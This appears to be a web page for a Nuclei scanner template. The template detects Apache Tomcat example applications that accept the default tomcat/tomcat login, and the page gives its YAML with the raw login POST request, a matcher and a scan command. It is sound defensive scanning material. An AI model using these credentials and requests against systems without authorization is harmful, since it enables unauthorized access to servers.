Apache Tomcat - Default Login Discovery

ID: tomcat-examples-login

Severity: info

Author: 0xelkomy & C0NQR0R

Tags: default-login,tomcat

Description

Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 default login credentials were successful.

YAML Source

id: tomcat-examples-login

info:
  name: Apache Tomcat - Default Login Discovery
  author: 0xelkomy & C0NQR0R
  severity: info
  description: Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81  default login credentials were successful.
  reference:
    - https://c0nqr0r.github.io/CVE-2022-34305/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    cvss-score: 0
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
  tags: default-login,tomcat

http:
  - raw:
      - |
        GET /examples/jsp/security/protected/index.jsp HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /examples/jsp/security/protected/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

    attack: pitchfork
    payloads:
      username:
        - tomcat
      password:
        - tomcat
    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You are logged in as remote user"
          - "{{username}}"
        condition: and
# digest: 4a0a00473045022027073f5cdfcbe60666397898fb94071846135a47850312eb084f1c714d506f20022100fcffbe138b3245ff59d3007b562bf5af65ca4abe6d314678988958994c5efc9e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/apache/tomcat-examples-login.yaml"

View on Github